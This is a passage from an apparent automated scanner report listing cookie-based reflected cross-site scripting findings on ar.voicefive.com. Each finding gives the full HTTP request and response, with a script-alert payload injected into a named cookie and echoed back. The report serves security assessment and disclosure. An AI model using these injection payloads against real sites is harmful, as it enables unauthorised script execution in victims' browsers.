Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&43c30<script>alert(1)</script>8e3472c0de8; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_da39f516a098b3de&#41; ar_p68511049=exp=8&initExp=Mon Jan 31 16:31:23 2011&recExp=Tue Feb 8 18:06:45 2011&prad=264255448&arc=185637092&; ar_p85001580=exp=52&initExp=Wed Jan 26 20:14:29 2011&recExp=Wed Feb 9 14:06:00 2011&prad=58087509&arc=40400793&; ar_p84068139=exp=4&initExp=Sat Feb 12 20:00:22 2011&recExp=Sat Feb 12 20:06:47 2011&prad=%25V%2DOTLT%2DID%25&arc=%25V%2DBCAM%2DID%25&; ar_p86183782=exp=2&initExp=Sat Feb 12 23:06:06 2011&recExp=Sat Feb 12 23:06:58 2011&prad=59264590&arc=40675901&; BMX_BR=pid=p84532700&prad=47146&arc=34917&exp=1297559105; ar_p84532700=exp=12&initExp=Sat Feb 12 19:58:06 2011&recExp=Sun Feb 13 01:05:05 2011&prad=47146&arc=34917&; UID=1d29d89e-72.246.30.75-1294456810

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 13 Feb 2011 14:17:55 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p84053757=exp=1&initExp=Sun Feb 13 14:17:55 2011&recExp=Sun Feb 13 14:17:55 2011&prad=1160022&arc=1422863&; expires=Sat 14-May-2011 14:17:55 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1297606675; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 27401

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"1160022",Pid:"p84053757",Arc:"1422863",Location:COMS
...[SNIP]...
t Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&', "ar_p83612734": 'exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&43c30<script>alert(1)</script>8e3472c0de8', "ar_p84068139": 'exp=4&initExp=Sat Feb 12 20:00:22 2011&recExp=Sat Feb 12 20:06:47 2011&prad=%25V%2DOTLT%2DID%25&arc=%25V%2DBCAM%2DID%25&', "ar_p68511049": 'exp=8&initExp=Mon Jan 31 16:31:23 2011&
...[SNIP]...

2.103. http://ar.voicefive.com/bmx3/broker.pli [ar_p84053757 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p84053757 cookie is copied into the HTML document as plain text between tags. The payload c50a6<script>alert(1)</script>48d9c10229e was submitted in the ar_p84053757 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p84053757&PRAd=1160022&AR_C=1420280 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_da39f516a098b3de&#41; ar_p68511049=exp=8&initExp=Mon Jan 31 16:31:23 2011&recExp=Tue Feb 8 18:06:45 2011&prad=264255448&arc=185637092&; ar_p85001580=exp=52&initExp=Wed Jan 26 20:14:29 2011&recExp=Wed Feb 9 14:06:00 2011&prad=58087509&arc=40400793&; ar_p84068139=exp=4&initExp=Sat Feb 12 20:00:22 2011&recExp=Sat Feb 12 20:06:47 2011&prad=%25V%2DOTLT%2DID%25&arc=%25V%2DBCAM%2DID%25&; ar_p86183782=exp=2&initExp=Sat Feb 12 23:06:06 2011&recExp=Sat Feb 12 23:06:58 2011&prad=59264590&arc=40675901&; BMX_BR=pid=p84532700&prad=47146&arc=34917&exp=1297559105; ar_p84532700=exp=12&initExp=Sat Feb 12 19:58:06 2011&recExp=Sun Feb 13 01:05:05 2011&prad=47146&arc=34917&; ar_p84053757=exp=1&initExp=Sun Feb 13 14:17:53 2011&recExp=Sun Feb 13 14:17:53 2011&prad=1160023&arc=1420279&c50a6<script>alert(1)</script>48d9c10229e; BMX_G=method->-1,ts->1297606673; BMX_3PC=1; ar_s_p84053757=1->1297606675; UID=1d29d89e-72.246.30.75-1294456810

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 13 Feb 2011 14:24:40 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p84053757=exp=2&initExp=Sun Feb 13 14:17:53 2011&recExp=Sun Feb 13 14:24:40 2011&c50a6<script>alert(1)</script>48d9c10229e=&prad=1160022&arc=1420280&; expires=Sat 14-May-2011 14:24:40 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 27610

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"1160022",Pid:"p84053757",Arc:"1420280",Location:COMS
...[SNIP]...
itExp=Sat Feb 12 19:58:06 2011&recExp=Sun Feb 13 01:05:05 2011&prad=47146&arc=34917&', "ar_p84053757": 'exp=1&initExp=Sun Feb 13 14:17:53 2011&recExp=Sun Feb 13 14:17:53 2011&prad=1160023&arc=1420279&c50a6<script>alert(1)</script>48d9c10229e', "ar_p45555483": 'exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&', "ar_p83612734": 'exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:5
...[SNIP]...

2.104. http://ar.voicefive.com/bmx3/broker.pli [ar_p84068139 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p84068139 cookie is copied into the HTML document as plain text between tags. The payload c2751<script>alert(1)</script>7dc74c224de was submitted in the ar_p84068139 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p84053757&PRAd=1160022&AR_C=1422863 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_da39f516a098b3de&#41; ar_p68511049=exp=8&initExp=Mon Jan 31 16:31:23 2011&recExp=Tue Feb 8 18:06:45 2011&prad=264255448&arc=185637092&; ar_p85001580=exp=52&initExp=Wed Jan 26 20:14:29 2011&recExp=Wed Feb 9 14:06:00 2011&prad=58087509&arc=40400793&; ar_p84068139=exp=4&initExp=Sat Feb 12 20:00:22 2011&recExp=Sat Feb 12 20:06:47 2011&prad=%25V%2DOTLT%2DID%25&arc=%25V%2DBCAM%2DID%25&c2751<script>alert(1)</script>7dc74c224de; ar_p86183782=exp=2&initExp=Sat Feb 12 23:06:06 2011&recExp=Sat Feb 12 23:06:58 2011&prad=59264590&arc=40675901&; BMX_BR=pid=p84532700&prad=47146&arc=34917&exp=1297559105; ar_p84532700=exp=12&initExp=Sat Feb 12 19:58:06 2011&recExp=Sun Feb 13 01:05:05 2011&prad=47146&arc=34917&; UID=1d29d89e-72.246.30.75-1294456810

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 13 Feb 2011 14:17:56 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p84053757=exp=1&initExp=Sun Feb 13 14:17:56 2011&recExp=Sun Feb 13 14:17:56 2011&prad=1160022&arc=1422863&; expires=Sat 14-May-2011 14:17:56 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1297606676; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 27401

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"1160022",Pid:"p84053757",Arc:"1422863",Location:COMS
...[SNIP]...
&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&', "ar_p84068139": 'exp=4&initExp=Sat Feb 12 20:00:22 2011&recExp=Sat Feb 12 20:06:47 2011&prad=%25V%2DOTLT%2DID%25&arc=%25V%2DBCAM%2DID%25&c2751<script>alert(1)</script>7dc74c224de', "ar_p68511049": 'exp=8&initExp=Mon Jan 31 16:31:23 2011&recExp=Tue Feb 8 18:06:45 2011&prad=264255448&arc=185637092&' };
COMSCORE.BMX.Broker.GlobalConfig={
"urlExcludeList": "http://photobucket.
...[SNIP]...

2.105. http://ar.voicefive.com/bmx3/broker.pli [ar_p84532700 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p84532700 cookie is copied into the HTML document as plain text between tags. The payload d8220<script>alert(1)</script>fb58a5e89b5 was submitted in the ar_p84532700 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p84053757&PRAd=1160022&AR_C=1422863 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_da39f516a098b3de&#41; ar_p68511049=exp=8&initExp=Mon Jan 31 16:31:23 2011&recExp=Tue Feb 8 18:06:45 2011&prad=264255448&arc=185637092&; ar_p85001580=exp=52&initExp=Wed Jan 26 20:14:29 2011&recExp=Wed Feb 9 14:06:00 2011&prad=58087509&arc=40400793&; ar_p84068139=exp=4&initExp=Sat Feb 12 20:00:22 2011&recExp=Sat Feb 12 20:06:47 2011&prad=%25V%2DOTLT%2DID%25&arc=%25V%2DBCAM%2DID%25&; ar_p86183782=exp=2&initExp=Sat Feb 12 23:06:06 2011&recExp=Sat Feb 12 23:06:58 2011&prad=59264590&arc=40675901&; BMX_BR=pid=p84532700&prad=47146&arc=34917&exp=1297559105; ar_p84532700=exp=12&initExp=Sat Feb 12 19:58:06 2011&recExp=Sun Feb 13 01:05:05 2011&prad=47146&arc=34917&d8220<script>alert(1)</script>fb58a5e89b5; UID=1d29d89e-72.246.30.75-1294456810

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 13 Feb 2011 14:17:56 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p84053757=exp=1&initExp=Sun Feb 13 14:17:56 2011&recExp=Sun Feb 13 14:17:56 2011&prad=1160022&arc=1422863&; expires=Sat 14-May-2011 14:17:56 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1297606676; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 27401

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"1160022",Pid:"p84053757",Arc:"1422863",Location:COMS
...[SNIP]...
xp=Sat Feb 12 23:06:06 2011&recExp=Sat Feb 12 23:06:58 2011&prad=59264590&arc=40675901&', "ar_p84532700": 'exp=12&initExp=Sat Feb 12 19:58:06 2011&recExp=Sun Feb 13 01:05:05 2011&prad=47146&arc=34917&d8220<script>alert(1)</script>fb58a5e89b5', "ar_p45555483": 'exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&', "ar_p83612734": 'exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:5
...[SNIP]...

2.106. http://ar.voicefive.com/bmx3/broker.pli [ar_p85001580 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p85001580 cookie is copied into the HTML document as plain text between tags. The payload 8ad6e<script>alert(1)</script>90d1b27338 was submitted in the ar_p85001580 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p84053757&PRAd=1160022&AR_C=1422863 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_da39f516a098b3de&#41; ar_p68511049=exp=8&initExp=Mon Jan 31 16:31:23 2011&recExp=Tue Feb 8 18:06:45 2011&prad=264255448&arc=185637092&; ar_p85001580=exp=52&initExp=Wed Jan 26 20:14:29 2011&recExp=Wed Feb 9 14:06:00 2011&prad=58087509&arc=40400793&8ad6e<script>alert(1)</script>90d1b27338; ar_p84068139=exp=4&initExp=Sat Feb 12 20:00:22 2011&recExp=Sat Feb 12 20:06:47 2011&prad=%25V%2DOTLT%2DID%25&arc=%25V%2DBCAM%2DID%25&; ar_p86183782=exp=2&initExp=Sat Feb 12 23:06:06 2011&recExp=Sat Feb 12 23:06:58 2011&prad=59264590&arc=40675901&; BMX_BR=pid=p84532700&prad=47146&arc=34917&exp=1297559105; ar_p84532700=exp=12&initExp=Sat Feb 12 19:58:06 2011&recExp=Sun Feb 13 01:05:05 2011&prad=47146&arc=34917&; UID=1d29d89e-72.246.30.75-1294456810

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 13 Feb 2011 14:17:55 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p84053757=exp=1&initExp=Sun Feb 13 14:17:55 2011&recExp=Sun Feb 13 14:17:55 2011&prad=1160022&arc=1422863&; expires=Sat 14-May-2011 14:17:55 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1297606675; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 27400

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"1160022",Pid:"p84053757",Arc:"1422863",Location:COMS
...[SNIP]...
8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&', "ar_p85001580": 'exp=52&initExp=Wed Jan 26 20:14:29 2011&recExp=Wed Feb 9 14:06:00 2011&prad=58087509&arc=40400793&8ad6e<script>alert(1)</script>90d1b27338', "BMX_BR": 'pid=p84532700&prad=47146&arc=34917&exp=1297559105', "ar_p86183782": 'exp=2&initExp=Sat Feb 12 23:06:06 2011&recExp=Sat Feb 12 23:06:58 2011&prad=59264590&arc=40675901&', "ar_p84532700"
...[SNIP]...

2.107. http://ar.voicefive.com/bmx3/broker.pli [ar_p86183782 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p86183782 cookie is copied into the HTML document as plain text between tags. The payload 852da<script>alert(1)</script>32d8fc7ba09 was submitted in the ar_p86183782 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p84053757&PRAd=1160022&AR_C=1422863 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_da39f516a098b3de&#41; ar_p68511049=exp=8&initExp=Mon Jan 31 16:31:23 2011&recExp=Tue Feb 8 18:06:45 2011&prad=264255448&arc=185637092&; ar_p85001580=exp=52&initExp=Wed Jan 26 20:14:29 2011&recExp=Wed Feb 9 14:06:00 2011&prad=58087509&arc=40400793&; ar_p84068139=exp=4&initExp=Sat Feb 12 20:00:22 2011&recExp=Sat Feb 12 20:06:47 2011&prad=%25V%2DOTLT%2DID%25&arc=%25V%2DBCAM%2DID%25&; ar_p86183782=exp=2&initExp=Sat Feb 12 23:06:06 2011&recExp=Sat Feb 12 23:06:58 2011&prad=59264590&arc=40675901&852da<script>alert(1)</script>32d8fc7ba09; BMX_BR=pid=p84532700&prad=47146&arc=34917&exp=1297559105; ar_p84532700=exp=12&initExp=Sat Feb 12 19:58:06 2011&recExp=Sun Feb 13 01:05:05 2011&prad=47146&arc=34917&; UID=1d29d89e-72.246.30.75-1294456810

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 13 Feb 2011 14:17:56 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p84053757=exp=1&initExp=Sun Feb 13 14:17:56 2011&recExp=Sun Feb 13 14:17:56 2011&prad=1160022&arc=1422863&; expires=Sat 14-May-2011 14:17:56 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1297606676; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 27401

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"1160022",Pid:"p84053757",Arc:"1422863",Location:COMS
...[SNIP]...
7509&arc=40400793&', "BMX_BR": 'pid=p84532700&prad=47146&arc=34917&exp=1297559105', "ar_p86183782": 'exp=2&initExp=Sat Feb 12 23:06:06 2011&recExp=Sat Feb 12 23:06:58 2011&prad=59264590&arc=40675901&852da<script>alert(1)</script>32d8fc7ba09', "ar_p84532700": 'exp=12&initExp=Sat Feb 12 19:58:06 2011&recExp=Sun Feb 13 01:05:05 2011&prad=47146&arc=34917&', "ar_p45555483": 'exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02
...[SNIP]...

2.108. http://ar.voicefive.com/bmx3/broker.pli [ar_s_p84053757 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_s_p84053757 cookie is copied into the HTML document as plain text between tags. The payload 35daa<script>alert(1)</script>a261e708ef6 was submitted in the ar_s_p84053757 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p84053757&PRAd=1160022&AR_C=1420280 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_da39f516a098b3de&#41; ar_p68511049=exp=8&initExp=Mon Jan 31 16:31:23 2011&recExp=Tue Feb 8 18:06:45 2011&prad=264255448&arc=185637092&; ar_p85001580=exp=52&initExp=Wed Jan 26 20:14:29 2011&recExp=Wed Feb 9 14:06:00 2011&prad=58087509&arc=40400793&; ar_p84068139=exp=4&initExp=Sat Feb 12 20:00:22 2011&recExp=Sat Feb 12 20:06:47 2011&prad=%25V%2DOTLT%2DID%25&arc=%25V%2DBCAM%2DID%25&; ar_p86183782=exp=2&initExp=Sat Feb 12 23:06:06 2011&recExp=Sat Feb 12 23:06:58 2011&prad=59264590&arc=40675901&; BMX_BR=pid=p84532700&prad=47146&arc=34917&exp=1297559105; ar_p84532700=exp=12&initExp=Sat Feb 12 19:58:06 2011&recExp=Sun Feb 13 01:05:05 2011&prad=47146&arc=34917&; ar_p84053757=exp=1&initExp=Sun Feb 13 14:17:53 2011&recExp=Sun Feb 13 14:17:53 2011&prad=1160023&arc=1420279&; BMX_G=method->-1,ts->1297606673; BMX_3PC=1; ar_s_p84053757=1->129760667535daa<script>alert(1)</script>a261e708ef6; UID=1d29d89e-72.246.30.75-1294456810

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 13 Feb 2011 14:24:40 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p84053757=exp=2&initExp=Sun Feb 13 14:17:53 2011&recExp=Sun Feb 13 14:24:40 2011&prad=1160022&arc=1420280&; expires=Sat 14-May-2011 14:24:40 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 27610

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"1160022",Pid:"p84053757",Arc:"1420280",Location:COMS
...[SNIP]...
p=Sun Feb 13 01:05:05 2011&prad=47146&arc=34917&', "ar_p84053757": 'exp=1&initExp=Sun Feb 13 14:17:53 2011&recExp=Sun Feb 13 14:17:53 2011&prad=1160023&arc=1420279&', "ar_s_p84053757": '1->129760667535daa<script>alert(1)</script>a261e708ef6', "UID": '1d29d89e-72.246.30.75-1294456810', "ar_p85001580": 'exp=52&initExp=Wed Jan 26 20:14:29 2011&recExp=Wed Feb 9 14:06:00 2011&prad=58087509&arc=40400793&', "BMX_3PC": '1', "BMX_BR": 'pid=p
...[SNIP]...

2.109. http://ar.voicefive.com/bmx3/node_hulu.pli [UID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/node_hulu.pli

Issue detail

The value of the UID cookie is copied into the HTML document as plain text between tags. The payload f15f0<script>alert(1)</script>04bbaea526f was submitted in the UID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/node_hulu.pli HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.hulu.com/plus?src=topnav
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
